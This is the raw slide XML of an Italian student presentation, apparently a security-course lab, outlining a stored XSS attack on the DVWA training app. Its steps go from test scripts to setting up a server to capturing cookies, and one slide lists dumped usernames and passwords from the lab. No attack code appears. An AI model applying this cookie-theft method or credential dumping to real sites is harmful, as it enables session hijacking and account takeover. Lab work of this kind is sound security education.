          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="882283" y="5909310"/>
            <a:ext cx="6460064" cy="33489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Qui di seguito possiamo visualizzare gli user sulla sinistra e le password sulla colonna destra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>admin        password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Pablo         letmein</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Hack          charley</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Gordon      abc123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Bob            password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411774" y="-1496466"/>
            <a:ext cx="17526836" cy="16781945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="16781945" w="17526836">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17526836" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526836" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3097459" y="4428118"/>
            <a:ext cx="1646301" cy="1646295"/>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8059" r="0" b="-8059"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="12564163" y="4422464"/>
            <a:ext cx="1689238" cy="1689231"/>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7525" t="0" r="-17525" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7820412" y="4406650"/>
            <a:ext cx="1701096" cy="1701089"/>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6666" r="0" b="-16666"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5429560" y="4406650"/>
            <a:ext cx="1705052" cy="1705045"/>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15911" r="0" b="-35679"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="749041" y="4461444"/>
            <a:ext cx="1654214" cy="1654208"/>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0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 13" id="13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10207308" y="4406650"/>
            <a:ext cx="1661530" cy="1661523"/>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0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14948726" y="4363128"/>
            <a:ext cx="1705052" cy="1705045"/>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0" t="-16818" r="0" b="-16818"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1679007" y="1809746"/>
            <a:ext cx="14929987" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7500">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Helveticish Bold"/>
              </a:rPr>
              <a:t>Team 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 18" id="18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="361285" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 19" id="19"/>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20" id="20"/>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FEDERICO B.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 21" id="21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2791012" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 22" id="22"/>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23" id="23"/>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FEDERICO S.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 24" id="24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9823210" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 25" id="25"/>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26" id="26"/>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ANDRÉ V.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 27" id="27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7456097" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 28" id="28"/>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29" id="29"/>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MARA</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 30" id="30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5127934" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 31" id="31"/>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32" id="32"/>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ZHONGSHI L.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 33" id="33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="12193919" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 34" id="34"/>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35" id="35"/>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MARIO M.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 36" id="36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14586389" y="6686625"/>
            <a:ext cx="2429727" cy="804740"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3239636" cy="1072987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 37" id="37"/>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38" id="38"/>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OTMAN H.</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23950" y="5266632"/>
            <a:ext cx="13834282" cy="253591"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18445710" cy="338121"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 3" id="3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="1156" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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5" id="5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="4278354" y="1156"/>
              <a:ext cx="335808" cy="33580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5423755">
              <a:off x="13524447" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="18108745" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="8927951" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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name="AutoShape 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="true">
            <a:off x="1250745" y="5383902"/>
            <a:ext cx="13580692" cy="1905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4331848" y="6049841"/>
            <a:ext cx="2702757" cy="1506912"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3603676" cy="2009216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 15" id="15"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3603676"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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 16" id="16"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3603676" cy="10934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Settaggio DVWA e pagina XSS stored</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1123950" y="6049841"/>
            <a:ext cx="2459408" cy="1506912"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="2009216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 19" id="19"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="10934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Descrizione XSS Stored</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7787080" y="6049841"/>
            <a:ext cx="2459408" cy="2050519"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="2734025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 21" id="21"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 22" id="22"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="1801739"/>
              <a:ext cx="3279211" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 23" id="23"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="5346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Script di prova</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 24" id="24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11266418" y="6049841"/>
            <a:ext cx="2680634" cy="2518983"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3574179" cy="3358643"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 25" id="25"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3574179"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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 26" id="26"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2919339"/>
              <a:ext cx="3574179" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 27" id="27"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3574179" cy="16522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Creazione server e modifica pagina XSS Stored</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 28" id="28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14704642" y="6049841"/>
            <a:ext cx="2459408" cy="2881173"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="3841565"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 29" id="29"/>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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 30" id="30"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2919339"/>
              <a:ext cx="3279211" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 31" id="31"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="16522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Script finale e ottenimento dei cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 32" id="32"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="1829822"/>
            <a:ext cx="11515725" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7679"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>Procedimento </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7679"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>XSS stored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 33" id="33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="10045834">
            <a:off x="-3383347" y="8335908"/>
            <a:ext cx="12248502" cy="11727941"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="11727941" w="12248502">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12248502" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12248502" y="11727941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11727941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 34" id="34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-3479534">
            <a:off x="3130253" y="8455221"/>
            <a:ext cx="12248502" cy="11727941"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="11727941" w="12248502">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12248502" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12248502" y="11727940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1172794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670934"/>
            <a:ext cx="6146083" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="1057909" indent="-528955" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5879"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4899">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> Descrizione XSS  stored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1600921" y="2674685"/>
            <a:ext cx="6146083" cy="4187190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3360"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Gli attacchi di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>XSS Stored o persistenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>avvengono quando il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>viene spedito al sito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>vulnerabile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>e poi successivamente salvato. Quando una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>pagina richiama il codice malevolo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> salvato e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
